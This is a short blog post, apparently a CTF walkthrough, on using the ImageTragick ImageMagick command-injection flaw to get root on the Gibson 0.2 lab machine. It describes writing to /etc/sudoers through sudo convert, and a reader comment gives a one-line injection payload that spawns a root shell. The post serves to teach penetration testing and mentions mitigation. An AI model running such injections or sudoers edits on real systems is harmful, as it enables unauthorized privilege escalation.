Due to the way ImageMagick works, it’s possible to execute shell command injection. If a web server also uses ImageMagick to process images that users upload, it’s possible for someone to conduct remote code execution. For example, a malicious attacker could craft a a file that executes a callback to a shell when a web server process it with ImageMagick.

Please refer to the Openwall post that does a great job of explaining the technical details of why and how the vulnerability works. For this post, I’ll give a quick example of how it could be used to gain root on Gibson: 0.2. My hope is that seeing this example should help you replicate ImageTragick in your future CTF/pen testing endeavors.

Though not the only way to take advantage of the exploit, below is how to structure your command in this example usage of ImageTragick.

The first thing you should understand is that the commands ran by this exploit will execute at the level of the user who ran it. For example, in Gibson 0.2, margo is a user that we were able to ssh into our target machine that is vulnerable to ImageTragick.

Running id shows that margo is a non-root user.

1

2

margo@gibson:~$ id

uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

This time, let’s run id with convert. As you can see below, it was executed by margo meaning we are still limited to margo’s permission levels.

As you can see, running convert with sudo now means you can run any command with root privileges. Knowing this, you can simply give margo full sudo privileges by echoing margo ALL=(ALL:ALL) ALL in /etc/sudoers.

I encourage you to read up on other ways ImageTragick can be used and how to mitigate it if you employ ImageMagick on your web servers. There is a whole site dedicated to it creatively named https://imagetragick.com/.

I hope this helps with your future projects. Leave a comment below if you have any questions or inputs.

2 thoughts on “ImageTragick Exploit Example”

I found that the pipe | did not work but by replacing it with semi-colon ; I was able to run” sudo convert ‘https:\\”; /bin/bash”‘ null.png ” this dropped me straight to root cheers thanx for the write up